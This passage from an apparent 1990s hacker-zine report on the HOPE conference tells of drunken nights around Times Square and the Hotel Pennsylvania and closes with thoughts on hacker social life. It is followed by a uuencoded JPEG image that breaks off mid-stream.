an incident, Lucifer 666 relayed in vivid detail his ex-girlfriend's
|
|||
|
Fallon-esque ability (much to the shock and envy of everyone listening),
|
|||
|
Count0 told his decapitated dog story, and there was much rejoicing. (YAY!)
|
|||
|
|
|||
|
As the night went on, Ice-9 and I decided now was the time to actually
|
|||
|
check out the seedy underbelly of Times Square. At 1:00 in the evening.
|
|||
|
Alone. Drunk. Wide-eyed out-of-towners staggering up side streets in
|
|||
|
one of New York City's sleaziest areas.
|
|||
|
|
|||
|
Within a few minutes of hitting 42nd and 7th, we were approached by a
|
|||
|
street hustler. "Yo, what you need? Crack? Smoke? H? You like young
|
|||
|
girls? What you need, mah man?" Ice-9, in his drunken glory, "Yo man,
|
|||
|
you don't know who the fuck you're dealing with! I'm the biggest fucking
|
|||
|
felon in the whole goddamn world. You don't have shit that I couldn't
|
|||
|
get, and probably don't already have." The hustler took a double-take
|
|||
|
and said, "Yo, I likes your style." Ice replied, "You damn Skippy!"
|
|||
|
|
|||
|
Shortly thereafter, another hustler showed up. "Yo man, you want crack?
|
|||
|
I got the rock right here." Ice looked at him and said, "Man, if I smoke
|
|||
|
any more crack tonight, I'm going to fucking explode." The dealer went
|
|||
|
away fast.
|
|||
|
|
|||
|
Times Square isn't quite as sleazy as it's made out to be actually.
|
|||
|
I've been in worse. It does, however, have the most extensive and
|
|||
|
cheapest collection of European smut this side of Copenhagen. In fact,
|
|||
|
the same movies from Holland would have cost 40 American dollars more in
|
|||
|
Holland than they did in New York. Beyond that, Times Square had little
|
|||
|
to offer anyone. That is, unless you wanted to spend a buck in a
|
|||
|
really sleazy peep show to grope some crack whore. I think not.
|
|||
|
|
|||
|
Somehow, we made it back to the Blarney Rock alive, only to find that they
|
|||
|
had kicked everyone out. We headed back to our cell and passed out.
|
|||
|
|
|||
|
The next morning, I came to early and wandered around the hotel. The second
|
|||
|
floor had caught on fire recently, and one wing was completely
|
|||
|
barbecued. All the gutted rooms were unlocked and the phones worked.
|
|||
|
God only knows why people weren't using these rooms as squatter's pads,
|
|||
|
considering how broke most hackers are.
|
|||
|
|
|||
|
The main ballroom in the hotel was very cool. It was easy to see how
|
|||
|
at one point in time the Pennsylvania was quite a sight to behold.
|
|||
|
I suppose it was much like New York itself in that respect: Once
|
|||
|
a marvel of the modern world, now a festering sore crying out for
|
|||
|
a good cleaning and some antibiotic.
|
|||
|
|
|||
|
We left New York at noon that day, and did not even get the chance to
|
|||
|
see the numerous panels scheduled for that day. With my complete absence
|
|||
|
from any panel it's doubtful I would have made it anyway.
|
|||
|
|
|||
|
-----------------------------------------------------------------------------
|
|||
|
|
|||
|
So, did I like HOPE? Yes. I like cons for what they should be:
|
|||
|
a chance to hang out in person with your idiot online friends. Hackers
|
|||
|
are an odd bunch. We are all basically a bunch of self-involved,
|
|||
|
egomaniacal, borderline-criminal attention-seekers. Rarely, if ever,
|
|||
|
can we expect to meet anyone stupid enough to share our interests.
|
|||
|
Normal citizens, with whom most of us share absolutely no common frame
|
|||
|
of reference, look at us as if we were Martians. Even those
|
|||
|
computer-literate folk who talk geekspeak and understand most of
|
|||
|
what we are saying are left in the dark when we begin babbling
|
|||
|
about breaking into anything.
|
|||
|
|
|||
|
Collectively, we are all fools, and without the opportunities of
|
|||
|
any social interaction with our peers, we will all fall prey to fear,
|
|||
|
uncertainty and doubt regarding each other. We had the social aspect
|
|||
|
many years ago in the early 80's with the proliferation of BBSes and
|
|||
|
teleconferences. Now, much of that interaction is lost. Compared to
|
|||
|
our subculture's "Golden Age," the teleconferences and BBSes that exist
|
|||
|
today are a pale reflection of the ones of yesterday. All we have is
|
|||
|
the inane banter provided by IRC and the occasional con.
|
|||
|
|
|||
|
Our only hope is each other.
|
|||
|
|
|||
|
See you all at Summercon 1995 - Atlanta, Georgia.
|
|||
|
|
|||
|
-----------------------------------------------------------------------------
|
|||
|
|
|||
|
begin 644 2600VAN.JPG
|
|||
|
M_]C_X``02D9)1@`!``$`:@!J``#__@`752U,96%D(%-Y<W1E;7,L($EN8RX`X
|
|||
|
M_]L`A``%`P,$`P,%!`0$!04%!@<,"`<'!P</"PL)#!(0$Q,2$!$1%!<=&!05S
|
|||
|
M&Q81$1DB&1L>'R`A(!,8)"8C("8=("`?`04%!0<&!P\("`\?%1$5'Q\?'Q\?4
|
|||
|
M'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q__`
|
|||
|
MQ`&B```!!0$!`0$!`0```````````0(#!`4&!P@)"@L!``,!`0$!`0$!`0$`_
|
|||
|
M```````!`@,$!08'"`D*"Q```@$#`P($`P4%!`0```%]`0(#``01!1(A,4$&D
|
|||
|
M$U%A!R)Q%#*!D:$((T*QP152T?`D,V)R@@D*%A<8&1HE)B<H*2HT-38W.#DZM
|
|||
|
M0T1%1D=(24I35%565UA96F-D969G:&EJ<W1U=G=X>7J#A(6&AXB)BI*3E)66)
|
|||
|
MEYB9FJ*CI*6FIZBIJK*SM+6VM[BYNL+#Q,7&Q\C)RM+3U-76U]C9VN'BX^3E\
|
|||
|
MYN?HZ>KQ\O/T]?;W^/GZ$0`"`0($!`,$!P4$!``!`G<``0(#$00%(3$&$D%1D
|
|||
|
M!V%Q$R(R@0@40I&AL<$)(S-2\!5B<M$*%B0TX27Q%Q@9&B8G*"DJ-38W.#DZF
|
|||
|
M0T1%1D=(24I35%565UA96F-D969G:&EJ<W1U=G=X>7J"@X2%AH>(B8J2DY255
|
|||
|
MEI>8F9JBHZ2EIJ>HJ:JRL[2UMK>XN;K"P\3%QL?(R<K2T]35UM?8V=KBX^3E&
|
|||
|
MYN?HZ>KR\_3U]O?X^?K_P``1"`#>`4`#`2$``A$!`Q$!_]H`#`,!``(1`Q$`?
|
|||
|
M/P#Y*(QFJDO!'/:JB.1'T//%`X]J;$A>E)TI#%#LO0D5/;SN)5RW`-)H:9H'$
|
|||
|
M)\@G/(//_P!:K,9(&*R9JC9\&8/BS3<CI.#^A-9WBB82>)=3<,1FX8C'UJ%\H
|
|||
|
M?R&4%=@P"L#]:<)&`^9`0/0U0#A+&>&4CZBHIDB9ALQP"?TH6@,L0<SL?IU-E
|
|||
|
M3N@VG.?J*3!;&6T$9Y:$Y_O*<4KJCHJHXCV],@C_`#^57<5B.6VE8KL&\J<_V
|
|||
|
M*<G\NM10*ZWJB1&0^A&*I-$6L=1IN51_7?\`T%7U8%2#U%8,U1F>)@$TY-IXA
|
|||
|
M,@_D:Y5AB0?[PK:GL9SW/0=`^6UCSZ#^9K45,MTP?;BN>6YHMBYJ@$?C?P<A2
|
|||
|
M8C]S$,#OF0]?SK;_`&NF23QS:[PQQ:@#:<8Z'^M8K^+#YE?89YRR$>&XE'(R8
|
|||
|
MX`QS]UZ]"_9%B"_$BX+1"$C3I>3GGYD]:VJ_PY"CI)'!>+Y3)\1[XGRBAO\`%
|
|||
|
MD$KG&ZFZC#&]O&S96*.`O(5.#@,G&>V3@?C54]HBENSM_P!GJWU[4-=>[TC4^
|
|||
|
M8+5+=Q]I5XBX,6#\J\CGMSGKGMSYM<R"7Q.C%B`9X^@^E$7'VLDET&TU!&GJ8
|
|||
|
MA!TW;_TR_JM;OP/A#^+851&)62)L;O1Q[>].7\-A'XT4/CG<@_$O5B4#?OB..
|
|||
|
M<]CCM]*R+)\Z5)@``Q]NWR"M:/\`#B3+XF<T8P,U2=<XY[5<6920S8/6D"$4'
|
|||
|
MVQ)!M/I2;3Z4!8`"*<G#"@2-C:!Y&<9V9]ZLKP`*Q9LBUI4E^FJVPTL;;LMB-
|
|||
|
M%LCA^W7C_P#75)K1M9\02QSMY9)=Y2.N5&6Q^1J59.X/834=,MX6MY[.>X-GU
|
|||
|
M.C,A=<OE>&&.!54P7*,H1D96Y&[@@<]1VZ5HG=:D*XX&[0`M#DG(P""P_`<CY
|
|||
|
MI3(KA9G*[2"%(YZT670?,7(QB9@6Q@U)(=L9P1Q6;-$1J`J+F.09';!I=L3'O
|
|||
|
MEE!]&&/YU/,5RBMI\;#(X'J#D5%-$\4L8,A*`YQZ5497):L:^FKF.3H,/Z8[?
|
|||
|
M"K@CV]P#4O<$9WB)Q+;1VXRKAMY8CY<<\?6N=^QS&6/:F[+#[O/Z=JU@[(B2R
|
|||
|
M=ST#2X3;V$.Y<?+SQ]:N),%YQTK![E[%W4&#?$3P8H[K:@CZR5L?M0WL2?$$5
|
|||
|
M+(2H6!0`"?[J^E8+^)!>I?V&>>ZBP&@(5'!DDQ],/7H/['Z[_']\PXQILO\`K
|
|||
|
MZ''6]32E(F/Q(\N\53%O'5S+ZW8/ZBK7B,D:8A!Y`"D>H//]!6L=%$E]3U#]F
|
|||
|
ME63R9-5\S*LWEX'3/$G^%>..'&O)(0=JSJ<GV(K*G_'G\BY?PXFMJYWV+(O7J
|
|||
|
MR>YP/O)72_L_PB/QDH=T'^K(^;C_`%T8[?6M)_PF*/QHQOC(/-^(>KLSHN+J3
|
|||
|
M4`<]G8?TJA9IC2V'!&T#]*UI?PXDM>^S`GNFO9'G=$1GY(08&:H,.1]*J.ADR
|
|||
|
MQI7%`7%#!`%I0N*0Q0O/2@+\V`!2`UF0@0@'@)V'&>._<U91.G(K-EHZ#P'8_
|
|||
|
MBX\66*MT5F?CU"DC]17+ZE-)9:_-<1*C%)W.UQD'GD$>E1'XVO();%?5M8GU7
|
|||
|
M-HOW,5O'#GRXX5VJI)R2*IQW,\$F^.:2-_[P8@_G71%)*QFR==8N0I5RLH.=+
|
|||
|
MP;/)/?@CGW[]ZKV>?M"@<9-%DEH"-=D9)WV@\'IC'Z4RX&%;VK(U,^*[N]["1
|
|||
|
M)BVT],#UJ9=8F0_O858$=.G%-TXO;<49RB2KJ=JQ!,+1GU7C^5,:X$MT@BE8E
|
|||
|
MKUYJ8TY1>I3FFM#=TQSY+KT)<YR,5>.0.<]*EC0HA61<,*KRZ)#.PP@'T%).G
|
|||
|
MP%O2;&6RDP9I&3&`K,2!^%:#(4&<?E2;U%8OW'[SXD^%0$SL6S_#YQ5K]IYUU
|
|||
|
M?XD2XV$K$@Y(X.Q:QA_%CZ,T_P"7;..U%-NAQ;=N0S'YB,=&]>*]+_9(&WQ7E
|
|||
|
MJ$WRAA8RCY`,?>B]*TJNU*1,?C1Y)K69?$D\@EPI?.,'T^E6==A+::H7`)9>O
|
|||
|
MWU[UO%Z(A]3U']F2)X5UE]J82W1SN.#QY@XKQJ\\D:O)AY-PD/&SCCWS65+^,
|
|||
|
M/.WD7/\`AQ-767$=GAAD>5C@_P"TO^%=K^S780ZCXUVL'4+"7'S#JKQD=O:K3
|
|||
|
MJ:4F$?C1R7Q5?S/'6JG:"1=S=3_TU:JUKQ8@=/G`Q^-:T_X:)?Q,YL<`U59@L
|
|||
|
M&P3VJT8L3<OJ/SI1CUH8(<(SC(Z4H3TJ2ARKBG1QYE7ZT@-5TR8<$G]T.V!V?
|
|||
|
MZ?XUJ6&LV6CZ<WGV<5Y,\N`C=0N.N<<5G)7T*V-SX>S1W/BF.>.#R4,<I$9;G
|
|||
|
M=M^0\9KB=6CW:C<'_IJW\ZF&DV-[%18<YH\G.*U)&/`!_"*6SC!NH]JD$,.A&
|
|||
|
MIW%8VX(M\TI&`=W&/H._?ZT3V[>4_`/%97LS0P?LUW:LVQ77GM0+R=8_+D16_
|
|||
|
M`&T;TSM^E:6A,E.<-!ZW=NP`EM`2!C(;';%+`(/MMOY!898;@W8Y]J%&4>N@G
|
|||
|
M.49=+,Z>TC)$O&,NW05/Y&T_>)]<UDRD12226Y+9&`,\MC\OUJ:.XECC64EE'
|
|||
|
M4M@[E!Q['O\`I2&7H;HN`2BY_P!DG^M6!*KX&-OU%2T"-6&W#_%_PU%T(^Q8_
|
|||
|
M'_`EJ#]J1@OQ4O$#<*D?_HM*SI_Q8^C+?\-G*ZN?^*<4>@S^O_UZ]._8_:-=Z
|
|||
|
M6UB209"VCXY]3'_A55OX$B8?&CQ^[?S-9E/NW\JN>)>-&5EX(E4?HU="6Q#Z[
|
|||
|
MGJW[,I>'PQXGN#LVK9<EASD>8>/\^E>(W49;7KC@X$KG^=94OX\_D7/^'$UM&
|
|||
|
M>#-:*%!)P!Q^'^%=_P#LTV^L+KE\VC26<-^MJ_E?;48QMRG!QSSCJ*TJ-*D[T
|
|||
|
MBBO?1P/CV;4)_%E^UPT*SF=S+Y3?)N+$G&><9I8SLB0$@_O1W_VJUA;D5A:\.
|
|||
|
MS.=(P*H3</\`A51,9$>*!QT--DH<K..`Q_.G++(O1OTI6&/6XD7N#^%2PW+EI
|
|||
|
MQ\BDBILBDS>6/<\6>#Y/&>O4=NU$UJ!AL=*R-$=9\+X]WB%@?X+:0]/;_P"O"
|
|||
|
M7'WY4WL^2%)D8\_6IA\;"6A454#'YE/XU(L!/TK1Z$H9+`0I]J73;9FNAE>A`
|
|||
|
M';/<4^@&U`GEW,I?.%E&[)R<8&>E3ZQK5MJK3+;:8ELB9"2J<&0>ZUBU=W*U@
|
|||
|
M,8M<?W,\]B/ZT+*1]^$GU^6ER]C3F$9+5C\\*C/M_P#6JLL,4.IP&%<`.IX.B
|
|||
|
M>_M50YD[$SM8ZG3F(MCP.7;I_O&GJZAR<#D"D]Q$-W`LTHZK@=0I(^E119";E
|
|||
|
M4;"QGUZ4(9>L8'1!NZGMG.*NQHQP@'-2P-;0KZWU#XV:-Y9YB>VC`8X.Y"N0=
|
|||
|
M/RJI^TC,+CXJZBP:(?+%]XJ/^6:^M94]*L?0M_`SC[_5K233#`DT9D$?3'^TS
|
|||
|
M/PZ5Z9^RWJMI:7VN+/=V\4KVRI$A8*79CP%'<\=JNO!^PD3"2YT>0M<1R:S+A
|
|||
|
MMG0+N;&6VCTZGBM/6IXY;!5AO+9<2!N+A?0]@?>NFVQDY(](^!6OV4/A#Q+9"
|
|||
|
MOJ,(NY[61(HF?#2L(W;@'D\9KQ]]1A_M22<RDH7;MZY_QK*E!JK/3L:3DN2)R
|
|||
|
M8U+7+:^BVH)%((Z@>]>B_LZ^+]'\.>(I&U*\-L'*HFZ)FWEN,<`XYQR:TJTY=
|
|||
|
M.DTA0FE.YP7C:YC?Q7JFXMN6Y=6P.,@D54.N1F,1B(X&#G/XUO3B^5$2DE)EN
|
|||
|
M-ONGZ529=STHD2&B,;@#5FWLXIG"G<.O0TIMH<4+-I\<>[:S?+C&:K&`AL9IE
|
|||
|
M1E<&K`(B*GL8B;I5]Z;8D>G>./`T'A"#PW-#<RS-JFB1WT@=0-C,W(![CBN;1
|
|||
|
MFC^2N=.Z3-MF=/\`"],:S=-_=LI#C\JXF^M))+N5UB<H7;D#(ZFBGI-DRV,Z<
|
|||
|
M:VV-T(IHAQT)%=!F(?-7@2.!]:LZ2TQOD_>':",\]LTFM!HZ"VB9I9A@#Y^F\
|
|||
|
MW'8=JBO8/*1P`,`>E8]31,QTUE0/FA<?0YJ:+5[4_>#+CU6FZ;0*:+"W]G*HR
|
|||
|
M^8#USQ4.R&;4HS$0P&.@H2:!M&[9Q%;5<#J3_,T/&4/XU`T-^U`3%-V"O7_/U
|
|||
|
MX4\.I<%@II6&6871!\JJOL.*MV\I#;AU%2P)&\*KXQ^+UGHZEHC<A4W(0#N$`
|
|||
|
M1(_4"L;XM>$]0T?Q0FG7H_TJUL[>"0`AN4B50,@XZ`5-&IRN,?(J<;ILXZ/1&
|
|||
|
M9'4'=C/M7IWP0^&=UXC34[VT/^E:5<V=RK;PH\L-(7_55/X5O6JVILSA#WCAP
|
|||
|
M;/P#KOB/4IHM(TRZNW+,V(HR0%#8))Z`#(R3P*[73OV>-:O]/CBN_$/A'3)%4
|
|||
|
M)#+<ZQ$Q4YZ?N]U5*O&*#V3.W\(?L]Z=H^F@S^/_``@=32Y,@D@OW9#$8]NT>
|
|||
|
M_*.<DGZ&L=?V2;J4-&GC'PT\C.&6Y6_'D*A[$$;RV<=!CFL?K-G?]#6-*+5F!
|
|||
|
M.;]CKQ(DPMH-<T"\>3:4N8=0401CG.\,-Y/3[JGK6YH'[*7BC0`]A>1Z7J4EG
|
|||
|
MY<0-!=V5R6%ML8[MVY1P0PZ?W>AJGBDU9!&C%-7?X'H&N_LPB;Q=#=P>%K*\\
|
|||
|
MT^7Y[N1Y%!+D2$G'7@^6,]^3QSFAI_P#@LK>1]5\`:>BQ3)]R-G9D\T[CQ_L^
|
|||
|
M8Q6?OI:-FEXOHCY)?A&'M5:)07&1W_I7:CB8OE+YB\'J:L6T>R0')&,U,F.*1
|
|||
|
M))!O=UW9R!VIKV;>:!D?=J$[%,B:`PGGO4E@G^G?0?TJB=CVWXSIG1OA^Z@;=
|
|||
|
M3X7A&0>,A^:\[:'>F.E8QV1H]V=/\,;?&IZB2,[=/D/_`(\M>W?`KPAX?U_X*
|
|||
|
M&FYUZ":>WM]6N'D6*9(R$S$6)+,H``3DYSM+`<FL9ZM_(J)I^._V4]#U;PR_<
|
|||
|
MB+P5?71,MN)[:SN,,L@8JP"L<$9'3.><9-?-TVBO&Q6:R7/.=\`'\Q5JY$H]&
|
|||
|
MC%U3280<>2B'/\*XJAI%EY=[(0#A6&/S%=$7H9VL;EE`?-DXP-YZ9QT'KS3=%
|
|||
|
M1MSY3\=O6I*.<@\/SRS+$K#+,!RM6;[PE>Z=,T4AC8J<9!/^%/VJO8.70M^&C
|
|||
|
M_`6N>*-3BTS2=.DO;N4_)%%U./Y#WK9;X::SX9\0W6DZQI\EM>6A`E0X8+D9H
|
|||
|
M'(.",=\T.:V#E>Y?BT*2"$?(3R?YFJMQ8-&<D=*R;U*1P^L0R)J$H+9PW&:K>
|
|||
|
M+/<1D;)7&.F&-;JUB>IL>'KFZGO`LK%T1>YZ?XUUEI'O=5QR2*QJ:,N)U7P^B
|
|||
|
MA/\`PT)I7'"2_P`HC5;]H*U-U\2=4N5!.R11Q[`"N.+M./H;_99Y5+I\D+*FY
|
|||
|
MQU.!D$5]#_LB6+G3O%ZEECW6\$89C@#/G<G\ZZ:[3I,S@K2//_''C*71DD\+>
|
|||
|
M>'+ZYFTI5(M85&1/(6R\SC&,D]!GY5_,]OX/T*UO'=KKRW=55>HQQUQZ\YK..
|
|||
|
M,7&-WU*JRB[6^9Z#I7AJPC`^6*,#LH&35K4[&"&+RDAV@]^<FJ1!S-WX9BN)6
|
|||
|
M-R1@GWKL_AUX$EN+@75R\PMHC\L>XX=O\!6].*D]3.4FMCT2'3$L[4VD!DAA,
|
|||
|
M/.V*1D'Z&O._B)\03\,==L(I-<UCR+H;?)699`')X),G10-Q//:KJPA%72'1V
|
|||
|
ME.I)1/AIQ\K?2H[>VGD8-%"[@-C(&>U7>R,WN*;6X60?Z-*.3_":GMXY!.5,$
|
|||
|
M$@Y/:IDUW*2L/(V2N2K#@=13_-!D7Y&^[4#&-"T\N$5B?3%7],\,:Q<7I,&EW
|
|||
|
M7TO!^Y;NW;V%.Z6X<K>Q[QX5\/7GCSP?9>$/%6AZ[IDVF!CI.KKI<LJ*CL"\B
|
|||
|
M,B@9QG!![8[8YV+#]D#6M1A,MIXATXH#MS+#)&?R(S7/SV=D:\FEV0:K\`]7D
|
|||
|
M^$>FWNLZAJNFW:2P-;JEOYFX,?FSRH&,*>]6_P!G[X467CGX?>=J?B76H+*6]
|
|||
|
M\D#:=;2!(25(^8YR">G\/:I<K78))GTE!IZ6^D:?I4"3_9+&".!/+E`F=4"[1
|
|||
|
M?GX_NC/KS42Q"S79%H>LNH];Z-O_`$-ZA^:*7D5I=*T_490M[X-U"13U:5;"X
|
|||
|
M0#\W)J#5?@KX=O\`]YIMAX=M78@L+O0H)O\`T`H?U-$8I;:!*3]?O_4XC6O@^
|
|||
|
M+X@MVEDL_"GP]U.(L2!%!-:R$?3<5!_&N$U[P!?Z86BU#X"-<O\`WK&_N"I_G
|
|||
|
M%"P%:6:ZD73V,"X\(Z=','D^#/BBRQWAOICC_ON$U8U+P]X$D>W_`+5T'QC8E
|
|||
|
MRRC*YDBY('3YD&:A[Z,.FJ-WX91>$?!/BJS\0:(OBYGC5@T+VL3B1".5.UL^.
|
|||
|
MA^H%>UZ+XJ_X2[Q"C6NDZM9V=P#'=PWVBXCFP#@F4],>^1VP*:=]PV,SX@?`U
|
|||
|
M?2/$\HO=&M$TZ3!61(81Y3GU`'0_05X[XZ_9[UW0[87$5HUTC';^Y1B0?<8IK
|
|||
|
MNZU)L>-:_P#"S6+66XFO-(OK9=XVO+;LJD<=R*YFY\%7$3M]TJHSTK2-6PFBE
|
|||
|
MSI'AZ2RU*>+:?D5.,=R,FNHTW36:[A4@@%U'3WI2E?4I:'2>$K*>T^-MG?>6`
|
|||
|
MWE+=2+OQQ\L8R/PWC\ZYG]H"^D/Q!U/;*RPF7D`G&<GMT[5STK.I'T-).T3'@
|
|||
|
M\)^`O%/C>UGU/2]*O[^(3;#+%&[C<`,C(/7D5Z!;MJ_P7^%NMC44FMM7\12B[
|
|||
|
MUMK>52K10QJ?,E(/(SO(_"MZG*_<(BVM3Y]DNIW9I$(5`V,@"A-:U&V(,=W(^
|
|||
|
MI'3%=O*CGYF;VD?$_7K%U5]3OD4<;HKEUQ^&<5ZMX#\7:[XF_=?VW<2PK$SLL
|
|||
|
MQ?<?1>3G')&?;-93II:EQF:=YXW\2^%UCEN+^QD60GRP\*;FQZ!5!..*]]^%Y
|
|||
|
M&I^)-=\(6-Y<M#"\\7FHABP`O.WC(/(P?QJJ='=ILB5:/8W9[C7X\D_9)!VVA
|
|||
|
MQ$$?^/FOF7]I[6[RPU*.VU6R=I[O]]!<QN%$:+\NS:RL&^\3P1U%;.C=;DTZ8
|
|||
|
MRC+W=&>`>;`?XS_WS39)A'M,$KJ0W."161HR+^T+N.0;;F48/]\U.OB+4T+@2
|
|||
|
M7TQ"]`7)'44I4XO=`I-&SH[7]Q);76K:@]AI]QD^?Y/F.ZJ<$HF1NYR,D@9!P
|
|||
|
M&<BO:_!GQ'^"'A&*-Y?#NOZY=JOS7&H+%@_2,-M`^H)]ZYYP5[)&T6TCT;2/)
|
|||
|
MVMOA?IN$L?"EY:CT@MH5_DPK>M?VP_AY)@/8:O#]88^/_'ZCEY=D%V^IMV'[9
|
|||
|
M57PRN1AM0N;?VDM\_P#H)-=%IGQY^&^I\0>([92/^>L;Q_JR@4W)):H7*^AQ3
|
|||
|
MW[1'B[P]KWP]VZ/J]A>NL^YD@G5V4;'Y(!R!G%:'['5M&/@=IKX'[RZN6/\`F
|
|||
|
MW]8?TI*SD/5(]F$*Y'MTH\@`5IRF?,)L4'''Y4P6T*$E40$\G"CFIY4--H06X
|
|||
|
ML(D\P`@_[+$#\A3)+682.\-]*I/1'"NBG\@?UHM;8=^YROC.^UV/3YK)XTM#-
|
|||
|
M(R"/4[8EPOS`D.A&Y,C(R"V,U/X7\2^'?'5M,VE3>>+8A';R60H6SC!8`]!U*
|
|||
|
M%9.SERR-$K1NC5715CMS%#>7B>C>>78?]]9K,F\%7$SECXEUDY.=I:$#Z<1BY
|
|||
|
MJY+:$\QTMLWV>!(54[44*,MDX%8'CGP[/XHTMX+6[FM;A1F)UD*@-[XYQ5RUZ
|
|||
|
M5B4K,\QM_AM\4M#D=[/Q#!/DDJKS%QCC`PZ?6J^I>$_%]XTG]N?#WP[JZ%?F'
|
|||
|
MDB6..5O^!!L_I67)J.[1B2?"[PU=:C*]]X%\2:([%0TMLYGAZ=<L"<#VINJ_>
|
|||
|
M!;0K/3O[2TKQ''</`5D-HT/[W&X#L<\9]*):(:/(KOQ&-/\`B!#IZ1;6@U"YF
|
|||
|
MF,Q;A@\*#;CMCRL]>]<7\2=<M9O&=\+N)YHYU^8QL`0<L1C((I48>\K=@F]+_
|
|||
|
M&KIWQQE\*Z`-.\):OXFTZ8']W`_V22#)//`B!YK!^+/Q&O?'^KWVIWQ5?LUNY
|
|||
|
MEM%&CDK'(YR^,]N)!^(K=4FIJ3,Y2]VQYL9B+=(QV)8T`!P!@$XYKLV,C:L_%
|
|||
|
M#EG-X8N=3>259XFVH@88/([8^M;/@[Q/<>$-"N+JRF,=U<2>7"_'RA1@]?\`[
|
|||
|
M>!_"LE)S33[E62.W_9^\$W7Q*\8RZE?R2M8V<BW%TQZRMG*)^.W)]E^E?9VC6
|
|||
|
M*L5M(0`.,``=!76HJ,+(Y)RO.PKX"''3O7S/^V-I=["FEW^U9K"1S&NX?-;S^
|
|||
|
M=\'^ZZCD>L8/KEA#XCYB`QW%."Y8=.M<YU$;C$N,CK4MI8FZEES((XD&Z1R//
|
|||
|
MNC^I]!0W8:+-S=R3I&FYS%"FR(,V=BY)Q^9)^I-,497KV]:C8HN64-I'#(\[.
|
|||
|
M3>=M!A5,;<Y&=Q^F<8'4_G;MG!V-+SDXV`^^*AW`E\502:)JSVBS9VQHS`'[\
|
|||
|
MK%064^X;(_"LVWN)WY\QP>WS54+.*8GHSM?AS>W4BZS'-<2LBV1P&<D`[A7I0
|
|||
|
M'[,FEZ_XE>6RTO6[K2H(%:225$!526PHR,')/;/0&L904I-%J;BKGN&K^,/B\
|
|||
|
M1\*HX[G4-1T_7--\Q8_,;=OY.,LIY'X.WTKUK2_&%KJ?A.'7Y,6L#0&60,V1`
|
|||
|
M'MSNY[@$'GO4N\-&/26J/.)/VA]*)N99/]$@B#!/.;,TC8&W;$.QSU+#&*SH]
|
|||
|
MOVC=+N(%9M=M[28@;EETUV`/U68YK#G;V+LEN4-=^/'B:VT6XUC0;_PMJ]E:J
|
|||
|
M2(ET-L\,L._.TE6/W21C(/6N9MOVI?'=X?W.CZ!*H/)620_UJKL+(NS?M">,%
|
|||
|
M-8T^XLI]$M!'/$T;M%N#`$8."6.#CVK!\#?%'7?`DES'9V*R17#`M%(,!3VQ1
|
|||
|
M@UDW+FN-6M9'<0_M"^(F4%M!BQ[,?\:M1_M`ZWCYM`C_`._A_P`*I3D*R%7]]
|
|||
|
MHG5@VUM`AR/6X(_]EJ9?VA=4/3P[$WTN^?\`T&JYVA)(7_AHC4>G_",#/_7WN
|
|||
|
MT_\`':5?VBKA0!)X8?CKBZ!_]EHYV.Q-'^T9$2-_AZZ7_=F4_P!*HZY\;-$U(
|
|||
|
MZV:UG\/7R32?*DOR?*W8GGI1*>FJ"*L]#YV\3ZQHT^H1PR07D-VNLW#/=1*KO
|
|||
|
MC8T("@*S`$AAD].">:\U\3^9>:I)&RQDJVWS3"8V/U`R/U-51C[R?D:2J>YR?
|
|||
|
MM&_X&L;'2=,U37;RVB=M'L&>&13P;EV"Q9XZC+-_P"O-;EVDBR2Q:1]Q]#C_`
|
|||
|
M`/6:ZZ=W)LYJC5DDB":,HP7'3M3@CH20M;&1<MKZ:"RFMW9MCX(7MD5=NE":6
|
|||
|
M;:6APK;-Q/;YN?Z_I4VL]!GU-^R=;65GX$OEMI-TQOCYOS*<?NTQT_&O>=.'>
|
|||
|
ME6A)QD]JZ6[Q./[;(YGV`9.,5X'^V%J5NG@S3;%B/.EOA(@_V51@3_X\OYT#$
|
|||
|
MC\1\F@<U)$N9%Z=17,=A,ME]LN]J%%4<NYZ(O<FI)YDF(@ME9;5#D<89S_>;L
|
|||
|
MW]NP_$F65L=5XY@\/Z9X8\-Z;IUNR:D(6GU*1QS(94C="#_=`.`.V#ZY/+6Z>
|
|||
|
M@YRJG`J(WY=0ZEA".`%`XQTK:\"Z2FJ^+K:V,/FJ"9)$_O*@W,/J0"/QJ9/EP
|
|||
|
MBV-;F5XRO7U'Q3J4[R>:3<.OF8QO`.`WXXS52T7&23C`Q6D5:*1)UWP[!%MKS
|
|||
|
MDN"!]DQG_@0KZD_90T:TT[X2V%]#'BXOYI9)G[G;(R*/H`OZFIC\;_KH$](G+
|
|||
|
M4_$!&O;*'2(U66YU&X2"!"<?-N!W?0=3]*S_`(_>++;X?^!K3PQ8.JI#;*9`"
|
|||
|
M6QE%^5%/^\_)^E9XAWE8=%6B?'-SK<FH.UU=D3O)M9PQY[?=]!UXKZA^"W[+!
|
|||
|
MG@GQ5\/],U_75U&2[OXO/VK/L5%)RN`!Z8Z^M+6.B-%:UR?XO?`3PW\-/ACX#
|
|||
|
M@NO#T^H![I(_-$\JNH6-C)Q@`\D=237B/[/<,5[\0KNTGB5XI-,G?8PX+HNYP
|
|||
|
M3CZ!JG^9!V/=K2&W31;Y].6*VFCM]ZND2DC;U(R"/X2.?6O,-5^)]D]UY=];T
|
|||
|
M7C3!R@):)22/]U1GI7(GJ:V)(OCQ;0HJIYN`N5R\1XQU^[0O[0$,C;%#%CT&.
|
|||
|
M^+_XGW'YU7)+L%T:N@_$5]<NV:6(QH5(7?M/(V],*/[U4_$WQ7O=*U1=-T:QK
|
|||
|
MBO)TC\ZX>241QQ+VRW3/U_6E"'-*SV!NQK>&?BQ_;$,D-U;R6=]!CSK=V!(!G
|
|||
|
MZ,K?Q*?6LJ;XVF.5XO[-D+H_ELHE'!RJ]<8/+`<4.G:5@OH;H\>0S0J^U"K`_
|
|||
|
M$9]*J7'BN&Z80JL8+'`P!4,#QW4IH1JD-PS;D&NLKKGH""*9X[@M++4_/CGBC
|
|||
|
MB210RK(V-V."`?;BNNGND9RT1IPVMH_POTV#6;P0PZO?3SB8O@.D`$<:[CZ-\
|
|||
|
M)*?PKSN/1+BZBO+O3,BPM)`/WC*Q`=B$X[GCL*ZJ<D[JVM_^`8U(\J4KZ=NI2
|
|||
|
M)<VVN6#SPS6FGLENGF3'[#;R%5)VY+[#W('7K5=I[>WAB%QHMA).PWDMYB?*2
|
|||
|
M1\N0CC'K^57R]F9IHSDBBFF4?9E3+`;4<@8_X%G%77-P;B5A'&(R,8=0=H/Z1
|
|||
|
MU5@O8^F?V2+^V;1=2TA67[0DXN3GC>K*%SC/^R,_[U?0BQ[8PJG:H%;<VB,)S
|
|||
|
